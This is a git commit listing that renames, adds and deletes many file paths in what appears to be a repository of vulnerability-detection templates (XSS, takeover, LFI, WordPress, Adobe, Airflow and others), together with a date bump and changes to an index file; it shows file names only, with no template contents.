delete mode 100644 poc/subdomain_takeover/intercom-takeover-8167.yaml
create mode 100644 poc/subdomain_takeover/jazzhr-takeover-8235.yaml
create mode 100644 poc/subdomain_takeover/jetbrains-takeover-8292.yaml
delete mode 100644 poc/subdomain_takeover/kinsta-takeover-8495.yaml
create mode 100644 poc/subdomain_takeover/landingi-takeover-8566.yaml
delete mode 100644 poc/subdomain_takeover/landingi-takeover-8567.yaml
delete mode 100644 poc/subdomain_takeover/launchrock-takeover-8602.yaml
delete mode 100644 poc/subdomain_takeover/launchrock-takeover-8605.yaml
delete mode 100644 poc/subdomain_takeover/ngrok-takeover-9126.yaml
create mode 100644 poc/subdomain_takeover/ngrok-takeover-9128.yaml
delete mode 100644 poc/subdomain_takeover/pantheon-takeover-9459.yaml
delete mode 100644 poc/subdomain_takeover/pingdom-takeover-9584.yaml
create mode 100644 poc/subdomain_takeover/pingdom-takeover-9586.yaml
delete mode 100644 poc/subdomain_takeover/proposify-takeover-9695.yaml
create mode 100644 poc/subdomain_takeover/proposify-takeover-9696.yaml
create mode 100644 poc/subdomain_takeover/readme-takeover-9842.yaml
delete mode 100644 poc/subdomain_takeover/readthedocs-takeover-9844.yaml
create mode 100644 poc/subdomain_takeover/readthedocs-takeover-9846.yaml
delete mode 100644 poc/subdomain_takeover/s3-subtakeover-9968.yaml
create mode 100644 poc/subdomain_takeover/s3-subtakeover-9969.yaml
delete mode 100644 poc/subdomain_takeover/shopify-takeover-10201.yaml
delete mode 100644 poc/subdomain_takeover/simplebooklet-takeover-10272.yaml
create mode 100644 poc/subdomain_takeover/simplebooklet-takeover-10274.yaml
rename poc/subdomain_takeover/{smartjob-takeover-10324.yaml => smartjob-takeover-10322.yaml} (100%)
rename poc/subdomain_takeover/{smartling-takeover-10326.yaml => smartling-takeover-10327.yaml} (100%)
delete mode 100644 poc/subdomain_takeover/smugmug-takeover-10338.yaml
create mode 100644 poc/subdomain_takeover/smugmug-takeover-10339.yaml
create mode 100644 poc/subdomain_takeover/strikingly-takeover-10551.yaml
delete mode 100644 poc/subdomain_takeover/surge-takeover-10578.yaml
create mode 100644 poc/subdomain_takeover/tave-takeover-10660.yaml
delete mode 100644 poc/subdomain_takeover/tave-takeover-10662.yaml
rename poc/subdomain_takeover/{teamwork-takeover-10670.yaml => teamwork-takeover-10668.yaml} (100%)
create mode 100644 poc/subdomain_takeover/tictail-takeover-10766.yaml
delete mode 100644 poc/subdomain_takeover/tictail-takeover-10767.yaml
rename poc/subdomain_takeover/{tilda-takeover-10781.yaml => tilda-takeover-10783.yaml} (100%)
create mode 100644 poc/subdomain_takeover/tumblr-takeover-10845.yaml
delete mode 100644 poc/subdomain_takeover/tumblr-takeover-10847.yaml
rename poc/subdomain_takeover/{unbounce-takeover-10971.yaml => unbounce-takeover-10970.yaml} (100%)
rename poc/subdomain_takeover/{uptimerobot-takeover-10989.yaml => uptimerobot-takeover-10987.yaml} (100%)
delete mode 100644 poc/subdomain_takeover/vend-takeover-10996.yaml
create mode 100644 poc/subdomain_takeover/vend-takeover-10998.yaml
create mode 100644 poc/subdomain_takeover/vercel-takeover-11000.yaml
delete mode 100644 poc/subdomain_takeover/vercel-takeover-11001.yaml
delete mode 100644 poc/subdomain_takeover/webflow-takeover-11131.yaml
create mode 100644 poc/subdomain_takeover/webflow-takeover-11133.yaml
create mode 100644 poc/subdomain_takeover/wishpond-takeover-11216.yaml
delete mode 100644 poc/subdomain_takeover/wishpond-takeover-11217.yaml
create mode 100644 poc/subdomain_takeover/wordpress-takeover-11312.yaml
delete mode 100644 poc/subdomain_takeover/wordpress-takeover-11313.yaml
create mode 100644 poc/subdomain_takeover/wufoo-takeover-11648.yaml
delete mode 100644 poc/subdomain_takeover/wufoo-takeover-11649.yaml
delete mode 100644 poc/subdomain_takeover/zendesk-takeover-11780.yaml
create mode 100644 poc/subdomain_takeover/zendesk-takeover-11781.yaml
create mode 100644 poc/template_injection/pdf-signer-ssti-to-rce-9470.yaml
delete mode 100644 poc/template_injection/pdf-signer-ssti-to-rce-9472.yaml
create mode 100644 poc/template_injection/pikpikcussti.yaml
create mode 100644 poc/template_injection/twig-php-ssti-10856.yaml
delete mode 100644 poc/upload/exposed-jquery-file-upload.yaml
rename poc/upload/{oa-v9-uploads-file-9190.yaml => oa-v9-uploads-file-9191.yaml} (100%)
rename poc/upload/{oa-v9-uploads-file-9189.yaml => oa-v9-uploads-file.yaml} (100%)
create mode 100644 poc/upload/showdoc-file-upload-rce-10227.yaml
create mode 100644 poc/upload/unauthenticated-popup-upload-10921.yaml
rename poc/upload/{unauthenticated-popup-upload-10922.yaml => unauthenticated-popup-upload.yaml} (100%)
rename poc/vmware/{vmware-horizon-11041.yaml => vmware-horizon-11040.yaml} (100%)
create mode 100644 poc/vmware/vmware-horizon-log4j-jndi-rce.yaml
delete mode 100644 poc/vmware/vmware-vcenter-lfi-11047.yaml
create mode 100644 poc/vmware/vmware-vcenter-lfi.yaml
rename poc/vmware/{vmware-vrealize-detect-11057.yaml => vmware-vrealize-detect.yaml} (100%)
rename poc/vmware/{vmware-workflow-11059.yaml => vmware-workflow-11060.yaml} (100%)
create mode 100644 poc/vmware/vmware-workflow.yaml
delete mode 100644 poc/web/alphaweb-default-login.yaml
delete mode 100644 poc/web/artica-web-proxy-detect-545.yaml
rename poc/web/{artica-web-proxy-detect-543.yaml => artica-web-proxy-detect.yaml} (100%)
delete mode 100644 poc/web/axigen-webadmin-660.yaml
delete mode 100644 poc/web/axigen-webmail.yaml
delete mode 100644 poc/web/azkaban-web-client-676.yaml
create mode 100644 poc/web/azkaban-web-client-680.yaml
create mode 100644 poc/web/boa-web-fileread-11846.yaml
create mode 100644 poc/web/boa-web-server.yaml
create mode 100644 poc/web/cobbler-webgui-1123.yaml
delete mode 100644 poc/web/cobbler-webgui-1124.yaml
create mode 100644 poc/web/codemeter-webadmin-panel-1135.yaml
delete mode 100644 poc/web/codemeter-webadmin-panel-1138.yaml
create mode 100644 poc/web/exposed-webalizer-7358.yaml
delete mode 100644 poc/web/exposed-webalizer-7360.yaml
create mode 100644 poc/web/hashicorp-consul-webgui-7896.yaml
delete mode 100644 poc/web/honeywell-web-controller-7996.yaml
delete mode 100644 poc/web/icewarp-webclient-rce-8133.yaml
create mode 100644 poc/web/icinga-web-login-8134.yaml
delete mode 100644 poc/web/icinga-web-login-8137.yaml
delete mode 100644 poc/web/iplanet-web-server-8190.yaml
create mode 100644 poc/web/iplanet-web-server-8191.yaml
create mode 100644 poc/web/keenetic-web-login-8442.yaml
delete mode 100644 poc/web/keenetic-web-login-8443.yaml
create mode 100644 poc/web/oracle-iplanet-web-server-9392.yaml
delete mode 100644 poc/web/oracle-iplanet-web-server.yaml
create mode 100644 poc/web/saia-web-server-info.yaml
delete mode 100644 poc/web/sap-netweaver-webgui.yaml
create mode 100644 poc/web/sap-web-dispatcher-admin-portal-10071.yaml
create mode 100644 poc/web/slack-webhook(1).yaml
delete mode 100644 poc/web/slack-webhook-11865.yaml
create mode 100644 poc/web/spark-webui-unauth-10401.yaml
delete mode 100644 poc/web/web-config-11125.yaml
delete mode 100644 poc/web/web-ftp-detect-11136.yaml
create mode 100644 poc/web/web-local-craft-11139.yaml
delete mode 100644 poc/web/web-local-craft-11141.yaml
create mode 100644 poc/web/web-suite-detect-11168.yaml
delete mode 100644 poc/web/web-suite-detect.yaml
delete mode 100644 poc/web/webcamxp-5-11122.yaml
create mode 100644 poc/web/webcamxp-5.yaml
delete mode 100644 poc/web/webeditors-11129.yaml
delete mode 100644 poc/web/webflow-takeover-11131.yaml
create mode 100644 poc/web/webflow-takeover-11133.yaml
rename poc/web/{weblogic-t3-detect-11152.yaml => weblogic-t3-detect-11153.yaml} (100%)
delete mode 100644 poc/web/weblogic-weak-login-11154.yaml
create mode 100644 poc/web/webmodule-ee-11162.yaml
delete mode 100644 poc/web/webmodule-ee-11164.yaml
rename poc/web/{webmodule-ee-panel-11160.yaml => webmodule-ee-panel-11161.yaml} (100%)
delete mode 100644 poc/web/webui-rce-11170.yaml
create mode 100644 poc/web/webui-rce-11174.yaml
rename poc/web/{webview-addjavascript-interface-11177.yaml => webview-addjavascript-interface-11176.yaml} (100%)
create mode 100644 poc/web/webview-load-url-11180.yaml
delete mode 100644 poc/web/webview-load-url-11182.yaml
delete mode 100644 poc/web/xp-webcam.yaml
delete mode 100644 poc/wordpress/alfacgiapi-wordpress.yaml
create mode 100644 poc/wordpress/easy-wp-smtp-listing-7156.yaml
delete mode 100644 poc/wordpress/easy-wp-smtp-listing-7157.yaml
create mode 100644 poc/wordpress/feedwordpress-xss-7459.yaml
delete mode 100644 poc/wordpress/nativechurch-wp-theme-lfd-9001.yaml
delete mode 100644 poc/wordpress/trilithic-viewpoint-default-10835.yaml
delete mode 100644 poc/wordpress/viewpoint-system-status-11019.yaml
delete mode 100644 poc/wordpress/wordpress-accessible-wpconfig-11235.yaml
delete mode 100644 poc/wordpress/wordpress-affiliatewp-log-11240.yaml
create mode 100644 poc/wordpress/wordpress-affiliatewp-log-11242.yaml
create mode 100644 poc/wordpress/wordpress-bbpress-plugin-listing.yaml
create mode 100644 poc/wordpress/wordpress-db-repair-11252.yaml
rename poc/wordpress/{wordpress-debug-log-11258.yaml => wordpress-debug-log-11259.yaml} (100%)
rename poc/wordpress/{wordpress-detect-11261.yaml => wordpress-detect-11260.yaml} (100%)
delete mode 100644 poc/wordpress/wordpress-emergency-script-11272.yaml
create mode 100644 poc/wordpress/wordpress-emergency-script-11275.yaml
delete mode 100644 poc/wordpress/wordpress-git-config-11278.yaml
delete mode 100644 poc/wordpress/wordpress-gotmls-detect-11280.yaml
rename poc/wordpress/{wordpress-gtranslate-plugin-listing-11284.yaml => wordpress-gtranslate-plugin-listing-11282.yaml} (100%)
delete mode 100644 poc/wordpress/wordpress-gtranslate-plugin-listing.yaml
delete mode 100644 poc/wordpress/wordpress-infinitewp-auth-bypass-11288.yaml
rename poc/wordpress/{wordpress-installer-log-11290.yaml => wordpress-installer-log-11292.yaml} (100%)
delete mode 100644 poc/wordpress/wordpress-lfi.yaml
delete mode 100644 poc/wordpress/wordpress-redirection-plugin-listing-11306.yaml
rename poc/wordpress/{wordpress-redirection-plugin-listing.yaml => wordpress-redirection-plugin-listing-11308.yaml} (100%)
create mode 100644 poc/wordpress/wordpress-takeover-11312.yaml
delete mode 100644 poc/wordpress/wordpress-takeover-11313.yaml
create mode 100644 poc/wordpress/wordpress-themes-detect-11316.yaml
rename poc/wordpress/{wordpress-total-upkeep-backup-download-11322.yaml => wordpress-total-upkeep-backup-download-11324.yaml} (100%)
create mode 100644 poc/wordpress/wordpress-weak-credentials-11336.yaml
delete mode 100644 poc/wordpress/wordpress-weak-credentials-11337.yaml
delete mode 100644 poc/wordpress/wordpress-woocommerce-listing-11339.yaml
create mode 100644 poc/wordpress/wordpress-woocommerce-listing-11341.yaml
delete mode 100644 poc/wordpress/wordpress-woocommerce-sqli-11345.yaml
delete mode 100644 poc/wordpress/wordpress-woosidebars.yaml
create mode 100644 poc/wordpress/wordpress-wordfence-lfi-11346.yaml
delete mode 100644 poc/wordpress/wordpress-wordfence-lfi-11350.yaml
delete mode 100644 poc/wordpress/wordpress-wordfence-waf-bypass-xss-11356.yaml
delete mode 100644 poc/wordpress/wordpress-workflow-11363.yaml
create mode 100644 poc/wordpress/wordpress-workflow-11365.yaml
create mode 100644 poc/wordpress/wordpress-wpcourses-info-disclosure-11369.yaml
delete mode 100644 poc/wordpress/wordpress-wpcourses-info-disclosure-11371.yaml
delete mode 100644 poc/wordpress/wordpress-xmlrpc-listmethods-11372.yaml
rename poc/wordpress/{wordpress-xmlrpc-listmethods.yaml => wordpress-xmlrpc-listmethods-11374.yaml} (100%)
delete mode 100644 poc/wordpress/wordpress-zebra-form-xss-11378.yaml
create mode 100644 poc/wordpress/wordpress-zebra-form-xss-11379.yaml
create mode 100644 poc/wordpress/wordpress.yaml
create mode 100644 poc/wordpress/wp-ambience-xss-11407.yaml
create mode 100644 poc/wordpress/wp-arforms-listing-11415.yaml
rename poc/wordpress/{wp-code-snippets-xss-11425.yaml => wp-code-snippets-xss.yaml} (100%)
create mode 100644 poc/wordpress/wp-custom-tables-xss-11433.yaml
delete mode 100644 poc/wordpress/wp-custom-tables-xss-11434.yaml
mode change 100755 => 100644 poc/wordpress/wp-debug-log.yaml
delete mode 100644 poc/wordpress/wp-email-subscribers-listing.yaml
delete mode 100644 poc/wordpress/wp-finder-xss-11445.yaml
create mode 100644 poc/wordpress/wp-force-ssl.yaml
create mode 100644 poc/wordpress/wp-full-path-disclosure-11455.yaml
delete mode 100644 poc/wordpress/wp-full-path-disclosure-11457.yaml
create mode 100644 poc/wordpress/wp-grimag-open-redirect-11458.yaml
rename poc/wordpress/{wp-gtranslate-open-redirect.yaml => wp-gtranslate-open-redirect-11463.yaml} (100%)
delete mode 100644 poc/wordpress/wp-gtranslate-open-redirect-11465.yaml
rename poc/wordpress/{wp-install-11475.yaml => wp-install-11473.yaml} (100%)
create mode 100644 poc/wordpress/wp-install.yaml
create mode 100644 poc/wordpress/wp-javospot-lfi-11482.yaml
delete mode 100644 poc/wordpress/wp-javospot-lfi.yaml
delete mode 100644 poc/wordpress/wp-knews-xss-11487.yaml
create mode 100644 poc/wordpress/wp-knews-xss-11488.yaml
create mode 100644 poc/wordpress/wp-memphis-documents-library-lfi-11495.yaml
create mode 100644 poc/wordpress/wp-mstore-plugin-listing-11500.yaml
create mode 100644 poc/wordpress/wp-multiple-theme-ssrf-11513.yaml
delete mode 100644 poc/wordpress/wp-phpfreechat-xss-11524.yaml
create mode 100644 poc/wordpress/wp-plugin-1-flashgallery-listing-11530.yaml
rename poc/wordpress/{wp-plugin-1-flashgallery-listing-11531.yaml => wp-plugin-1-flashgallery-listing.yaml} (100%)
rename poc/wordpress/{wp-plugin-utlimate-member.yaml => wp-plugin-utlimate-member-11542.yaml} (100%)
rename poc/wordpress/{wp-popup-listing.yaml => wp-popup-listing-11543.yaml} (100%)
delete mode 100644 poc/wordpress/wp-prostore-open-redirect-11546.yaml
create mode 100644 poc/wordpress/wp-prostore-open-redirect-11550.yaml
delete mode 100644 poc/wordpress/wp-qards-listing-11552.yaml
create mode 100644 poc/wordpress/wp-qards-listing.yaml
create mode 100644 poc/wordpress/wp-revslider-file-download-11554.yaml
create mode 100644 poc/wordpress/wp-securimage-xss-11556.yaml
delete mode 100644 poc/wordpress/wp-securimage-xss-11560.yaml
rename poc/wordpress/{wp-sfwd-lms-listing-11562.yaml => wp-sfwd-lms-listing-11564.yaml} (100%)
delete mode 100644 poc/wordpress/wp-simple-fields-lfi-11569.yaml
delete mode 100644 poc/wordpress/wp-slideshow-xss-11572.yaml
create mode 100644 poc/wordpress/wp-slideshow-xss-11574.yaml
rename poc/wordpress/{wp-tutor-lfi-11600.yaml => wp-tutor-lfi.yaml} (100%)
create mode 100755 poc/wordpress/wp-vault-local-file-inclusion.yaml
create mode 100644 poc/wordpress/wp-whmcs-xss-11614.yaml
create mode 100644 poc/wordpress/wp-woocommerce-file-download-11620.yaml
delete mode 100644 poc/wordpress/wp-woocommerce-file-download.yaml
create mode 100644 poc/wordpress/wpdm-cache-session-11436.yaml
delete mode 100644 poc/wordpress/wpdm-cache-session-11438.yaml
delete mode 100644 poc/wordpress/wpengine-config-check.yaml
create mode 100644 poc/wordpress/wptouch-open-redirect-11592.yaml
create mode 100644 poc/xml_external_entity/springboot-actuators-jolokia-xxe-10430.yaml
delete mode 100644 poc/xml_external_entity/springboot-actuators-jolokia-xxe-10431.yaml
delete mode 100644 poc/xss/aem-setpreferences-xss.yaml
rename poc/xss/{aem-xss-childlist-selector-197.yaml => aem-xss-childlist-selector-198.yaml} (100%)
delete mode 100644 poc/xss/aem-xss-childlist-selector.yaml
delete mode 100644 poc/xss/basic-xss-prober-698.yaml
create mode 100644 poc/xss/coldfusion-debug-xss-1153.yaml
delete mode 100644 poc/xss/coldfusion-debug-xss.yaml
create mode 100644 poc/xss/concrete-xss-1178.yaml
rename poc/xss/{concrete-xss-1177.yaml => concrete-xss.yaml} (100%)
delete mode 100644 poc/xss/elex-woocommerce-xss-7199.yaml
create mode 100644 poc/xss/elex-woocommerce-xss.yaml
rename poc/xss/{empirecms-xss.yaml => empirecms-xss-7218.yaml} (100%)
delete mode 100644 poc/xss/empirecms-xss-7220.yaml
create mode 100644 poc/xss/feedwordpress-xss-7459.yaml
create mode 100644 poc/xss/flow-flow-social-stream-xss-7524.yaml
delete mode 100644 poc/xss/flow-flow-social-stream-xss.yaml
delete mode 100644 poc/xss/kafdrop-xss-8411.yaml
create mode 100644 poc/xss/laravel-ignition-xss.yaml
create mode 100644 poc/xss/mida-eframework-xss.yaml
delete mode 100644 poc/xss/moodle-filter-jmol-xss-8946.yaml
delete mode 100644 poc/xss/moodle-xss-8950.yaml
create mode 100644 poc/xss/oracle-ebs-xss-9373.yaml
delete mode 100644 poc/xss/oracle-ebs-xss-9376.yaml
create mode 100644 poc/xss/parentlink-xss-9467.yaml
create mode 100644 poc/xss/parentlink-xss.yaml
delete mode 100644 poc/xss/qcubed-xss-9749.yaml
create mode 100644 poc/xss/qcubed-xss.yaml
delete mode 100644 poc/xss/rockmongo-xss-9902.yaml
rename poc/{other/nuclei_template.yaml => xss/rxss.yaml} (100%)
create mode 100644 poc/xss/samsung-wlan-ap-xss-10012.yaml
delete mode 100644 poc/xss/samsung-wlan-ap-xss.yaml
create mode 100644 poc/xss/squirrelmail-add-xss-10515.yaml
delete mode 100644 poc/xss/squirrelmail-add-xss.yaml
create mode 100644 poc/xss/thruk-xss-10759.yaml
create mode 100644 poc/xss/top-xss-params-10807.yaml
delete mode 100644 poc/xss/top-xss-params-10809.yaml
rename poc/xss/{wems-manager-xss.yaml => wems-manager-xss-11192.yaml} (100%)
create mode 100644 poc/xss/window-name-domxss-11213.yaml
delete mode 100644 poc/xss/window-name-domxss.yaml
delete mode 100644 poc/xss/wordpress-wordfence-waf-bypass-xss-11356.yaml
delete mode 100644 poc/xss/wordpress-zebra-form-xss-11378.yaml
create mode 100644 poc/xss/wordpress-zebra-form-xss-11379.yaml
create mode 100644 poc/xss/wp-ambience-xss-11407.yaml
rename poc/xss/{wp-code-snippets-xss-11425.yaml => wp-code-snippets-xss.yaml} (100%)
create mode 100644 poc/xss/wp-custom-tables-xss-11433.yaml
delete mode 100644 poc/xss/wp-custom-tables-xss-11434.yaml
delete mode 100644 poc/xss/wp-finder-xss-11445.yaml
delete mode 100644 poc/xss/wp-knews-xss-11487.yaml
create mode 100644 poc/xss/wp-knews-xss-11488.yaml
delete mode 100644 poc/xss/wp-phpfreechat-xss-11524.yaml
create mode 100644 poc/xss/wp-securimage-xss-11556.yaml
delete mode 100644 poc/xss/wp-securimage-xss-11560.yaml
delete mode 100644 poc/xss/wp-slideshow-xss-11572.yaml
create mode 100644 poc/xss/wp-slideshow-xss-11574.yaml
create mode 100644 poc/xss/wp-whmcs-xss-11614.yaml
diff --git a/date.txt b/date.txt
index ee1c5e1ee9..d0a507843a 100644
--- a/date.txt
+++ b/date.txt
@@ -1 +1 @@
-20240608
+20240609
diff --git a/poc.txt b/poc.txt
index ee26840479..7eddf04341 100644
--- a/poc.txt
+++ b/poc.txt
@@ -18,7 +18,6 @@
./poc/adobe/adobe-coldfusion-detect-4.yaml
./poc/adobe/adobe-coldfusion-detect-5.yaml
./poc/adobe/adobe-coldfusion-detect-6.yaml
-./poc/adobe/adobe-coldfusion-detect-82.yaml
./poc/adobe/adobe-coldfusion-detect-83.yaml
./poc/adobe/adobe-coldfusion-detect-84.yaml
./poc/adobe/adobe-coldfusion-detector-1.yaml
@@ -29,29 +28,29 @@
./poc/adobe/adobe-coldfusion-detector-6.yaml
./poc/adobe/adobe-coldfusion-detector-error.yaml
./poc/adobe/adobe-coldfusion-error-detect-85.yaml
+./poc/adobe/adobe-coldfusion-error-detect-86.yaml
./poc/adobe/adobe-coldfusion-error-detect-87.yaml
-./poc/adobe/adobe-coldfusion-error-detect-88.yaml
+./poc/adobe/adobe-coldfusion-error-detect.yaml
./poc/adobe/adobe-component-login-1.yaml
./poc/adobe/adobe-component-login-2.yaml
-./poc/adobe/adobe-component-login-90.yaml
+./poc/adobe/adobe-component-login-89.yaml
+./poc/adobe/adobe-component-login-91.yaml
./poc/adobe/adobe-component-login-92.yaml
./poc/adobe/adobe-component-login.yaml
-./poc/adobe/adobe-connect-central-login-93.yaml
./poc/adobe/adobe-connect-central-login-94.yaml
./poc/adobe/adobe-connect-central-login-95.yaml
+./poc/adobe/adobe-connect-central-login-96.yaml
./poc/adobe/adobe-connect-central-login-97.yaml
./poc/adobe/adobe-connect-central-login.yaml
-./poc/adobe/adobe-connect-username-exposure-100.yaml
./poc/adobe/adobe-connect-username-exposure-101.yaml
./poc/adobe/adobe-connect-username-exposure-98.yaml
./poc/adobe/adobe-connect-username-exposure-99.yaml
./poc/adobe/adobe-connect-username-exposure.yaml
-./poc/adobe/adobe-connect-version-102.yaml
./poc/adobe/adobe-connect-version-103.yaml
-./poc/adobe/adobe-connect-version-104.yaml
+./poc/adobe/adobe-connect-version.yaml
./poc/adobe/adobe-connect.yaml
./poc/adobe/adobe-cq5.yaml
-./poc/adobe/adobe-experience-manager-login-105.yaml
+./poc/adobe/adobe-experience-manager-login-106.yaml
./poc/adobe/adobe-experience-manager-login-107.yaml
./poc/adobe/adobe-experience-manager-login-108.yaml
./poc/adobe/adobe-experience-manager-login-109.yaml
@@ -63,15 +62,15 @@
./poc/adobe/adobe-media-server-110.yaml
./poc/adobe/adobe-media-server-111.yaml
./poc/adobe/adobe-media-server-113.yaml
+./poc/adobe/adobe-media-server-114.yaml
./poc/adobe/adobe-media-server-115.yaml
-./poc/adobe/adobe-media-server.yaml
./poc/adobe/adobe-phish.yaml
./poc/adobe/adobe-robohelp.yaml
./poc/adobe/adobe-secret.yaml
./poc/adobe/aem-acs-common.yaml
./poc/adobe/aem-bg-servlet-127.yaml
./poc/adobe/aem-bg-servlet-128.yaml
-./poc/adobe/aem-bg-servlet-129.yaml
+./poc/adobe/aem-bg-servlet.yaml
./poc/adobe/aem-cached-pages-131.yaml
./poc/adobe/aem-cached-pages.yaml
./poc/adobe/aem-cms-finder.yaml
@@ -88,8 +87,8 @@
./poc/adobe/aem-default-get-servlet-11.yaml
./poc/adobe/aem-default-get-servlet-12.yaml
./poc/adobe/aem-default-get-servlet-13.yaml
+./poc/adobe/aem-default-get-servlet-135.yaml
./poc/adobe/aem-default-get-servlet-136.yaml
-./poc/adobe/aem-default-get-servlet-137.yaml
./poc/adobe/aem-default-get-servlet-139.yaml
./poc/adobe/aem-default-get-servlet-14.yaml
./poc/adobe/aem-default-get-servlet-15.yaml
@@ -143,7 +142,6 @@
./poc/adobe/aem-default-get-servlet-8.yaml
./poc/adobe/aem-default-get-servlet-9.yaml
./poc/adobe/aem-default-get-servlet.yaml
-./poc/adobe/aem-default-login-140.yaml
./poc/adobe/aem-default-login-141.yaml
./poc/adobe/aem-default-login-142.yaml
./poc/adobe/aem-detection-143.yaml
@@ -156,12 +154,11 @@
./poc/adobe/aem-fuzz.yaml
./poc/adobe/aem-gql-servlet-147.yaml
./poc/adobe/aem-gql-servlet-148.yaml
-./poc/adobe/aem-gql-servlet-149.yaml
+./poc/adobe/aem-gql-servlet-150.yaml
./poc/adobe/aem-gql-servlet.yaml
./poc/adobe/aem-groovyconsole-151.yaml
./poc/adobe/aem-groovyconsole-152.yaml
./poc/adobe/aem-groovyconsole-153.yaml
-./poc/adobe/aem-groovyconsole-154.yaml
./poc/adobe/aem-groovyconsole-155.yaml
./poc/adobe/aem-groovyconsole-156.yaml
./poc/adobe/aem-hash-querybuilder-157.yaml
@@ -169,18 +166,17 @@
./poc/adobe/aem-hash-querybuilder-160.yaml
./poc/adobe/aem-hash-querybuilder-161.yaml
./poc/adobe/aem-hash-querybuilder.yaml
-./poc/adobe/aem-jcr-querybuilder-162.yaml
./poc/adobe/aem-jcr-querybuilder-163.yaml
./poc/adobe/aem-jcr-querybuilder-164.yaml
+./poc/adobe/aem-jcr-querybuilder-165.yaml
./poc/adobe/aem-jcr-querybuilder-166.yaml
./poc/adobe/aem-list-custom.yaml
+./poc/adobe/aem-login-status-167.yaml
./poc/adobe/aem-login-status-168.yaml
-./poc/adobe/aem-login-status-169.yaml
./poc/adobe/aem-login-status-170.yaml
./poc/adobe/aem-login-status-171.yaml
./poc/adobe/aem-merge-metadata-servlet-172.yaml
./poc/adobe/aem-merge-metadata-servlet-173.yaml
-./poc/adobe/aem-merge-metadata-servlet-174.yaml
./poc/adobe/aem-misc-admin.yaml
./poc/adobe/aem-offloading-browser.yaml
./poc/adobe/aem-osgi-bundles.yaml
@@ -188,7 +184,7 @@
./poc/adobe/aem-querybuilder-feed-servlet-177.yaml
./poc/adobe/aem-querybuilder-internal-path-read-1.yaml
./poc/adobe/aem-querybuilder-internal-path-read-178.yaml
-./poc/adobe/aem-querybuilder-internal-path-read-180.yaml
+./poc/adobe/aem-querybuilder-internal-path-read-179.yaml
./poc/adobe/aem-querybuilder-internal-path-read-181.yaml
./poc/adobe/aem-querybuilder-internal-path-read-2.yaml
./poc/adobe/aem-querybuilder-internal-path-read-3.yaml
@@ -199,20 +195,19 @@
./poc/adobe/aem-querybuilder-json-servlet-184.yaml
./poc/adobe/aem-querybuilder-json-servlet-185.yaml
./poc/adobe/aem-querybuilder-json-servlet-187.yaml
+./poc/adobe/aem-secrets.yaml
./poc/adobe/aem-security-users.yaml
./poc/adobe/aem-setpreferences-xss-189.yaml
-./poc/adobe/aem-setpreferences-xss.yaml
./poc/adobe/aem-sling-login.yaml
./poc/adobe/aem-userinfo-servlet-190.yaml
./poc/adobe/aem-userinfo-servlet-191.yaml
-./poc/adobe/aem-userinfo-servlet-192.yaml
+./poc/adobe/aem-userinfo-servlet-193.yaml
./poc/adobe/aem-userinfo-servlet.yaml
./poc/adobe/aem-wcm-suggestions-servlet-194.yaml
./poc/adobe/aem-wcm-suggestions-servlet-195.yaml
./poc/adobe/aem-wcm-suggestions-servlet.yaml
./poc/adobe/aem-workflow.yaml
-./poc/adobe/aem-xss-childlist-selector-197.yaml
-./poc/adobe/aem-xss-childlist-selector.yaml
+./poc/adobe/aem-xss-childlist-selector-198.yaml
./poc/adobe/aem.yaml
./poc/adobe/aem_misconfig.yaml
./poc/adobe/cached-aem-pages.yaml
@@ -222,34 +217,34 @@
./poc/adobe/libwww-perl-daemon.yaml
./poc/adobe/mdaemon-email-server.yaml
./poc/adobe/mjniohttpdaemon.yaml
-./poc/adobe/possible-AEM-secrets.yaml
./poc/adobe/servudaemon-ini.yaml
./poc/adobe/vmware-authentication-daemon-detect.yaml
./poc/airflow/Airflow-Unauth.yaml
./poc/airflow/Airflow-unauthorized.yaml
./poc/airflow/airflow-api-exposure.yaml
./poc/airflow/airflow-configuration-exposure-229.yaml
-./poc/airflow/airflow-configuration-exposure.yaml
+./poc/airflow/airflow-configuration-exposure-230.yaml
+./poc/airflow/airflow-debug-231.yaml
./poc/airflow/airflow-debug-232.yaml
-./poc/airflow/airflow-debug-233.yaml
./poc/airflow/airflow-debug.yaml
./poc/airflow/airflow-default-credentials.yaml
./poc/airflow/airflow-default-login-235.yaml
./poc/airflow/airflow-default-login-236.yaml
./poc/airflow/airflow-detect-237.yaml
./poc/airflow/airflow-detect-238.yaml
-./poc/airflow/airflow-detect-239.yaml
+./poc/airflow/airflow-detect-240.yaml
./poc/airflow/airflow-exposure.yaml
-./poc/airflow/airflow-panel-241.yaml
+./poc/airflow/airflow-panel-242.yaml
./poc/airflow/airflow-panel-243.yaml
+./poc/airflow/airflow-panel-244.yaml
./poc/airflow/airflow-panel-245.yaml
./poc/airflow/airflow-panel.yaml
./poc/airflow/airflow-unauth.yaml
./poc/airflow/airflow-unauth.yml
./poc/airflow/airflow-workflow.yaml
./poc/airflow/apache-airflow.yaml
+./poc/airflow/unauthenticated-airflow-10884.yaml
./poc/airflow/unauthenticated-airflow-10885.yaml
-./poc/airflow/unauthenticated-airflow-10886.yaml
./poc/airflow/unauthenticated-airflow-10887.yaml
./poc/airflow/unauthenticated-airflow.yaml
./poc/apache/APACHE-Ambari-weakPass.yaml
@@ -272,20 +267,22 @@
./poc/apache/apache-airflow.yaml
./poc/apache/apache-ambari-default-password.yml
./poc/apache/apache-ambari.yaml
+./poc/apache/apache-answer-detect.yaml
./poc/apache/apache-apisix-dashboard.yaml
./poc/apache/apache-apisix-panel-336.yaml
-./poc/apache/apache-apisix-panel-337.yaml
+./poc/apache/apache-apisix-panel-338.yaml
./poc/apache/apache-apisix-panel.yaml
./poc/apache/apache-apisix.yaml
./poc/apache/apache-archiva.yaml
./poc/apache/apache-axis-detect-1.yaml
./poc/apache/apache-axis-detect-2.yaml
./poc/apache/apache-axis-detect-3.yaml
+./poc/apache/apache-axis-detect-339.yaml
./poc/apache/apache-axis-detect-340.yaml
-./poc/apache/apache-axis-detect.yaml
+./poc/apache/apache-axis-detect-341.yaml
./poc/apache/apache-axis.yaml
./poc/apache/apache-axis2.yaml
-./poc/apache/apache-cocoon-detect-342.yaml
+./poc/apache/apache-cocoon-detect.yaml
./poc/apache/apache-cocoon.yaml
./poc/apache/apache-config-343.yaml
./poc/apache/apache-config-344.yaml
@@ -294,10 +291,10 @@
./poc/apache/apache-couchdb-unauth.yaml
./poc/apache/apache-couchdb.yaml
./poc/apache/apache-detect-345.yaml
+./poc/apache/apache-detect-346.yaml
./poc/apache/apache-detect-347.yaml
./poc/apache/apache-detect-348.yaml
./poc/apache/apache-detect-349.yaml
-./poc/apache/apache-detect.yaml
./poc/apache/apache-dir-listing.yaml
./poc/apache/apache-directory-exposure.yaml
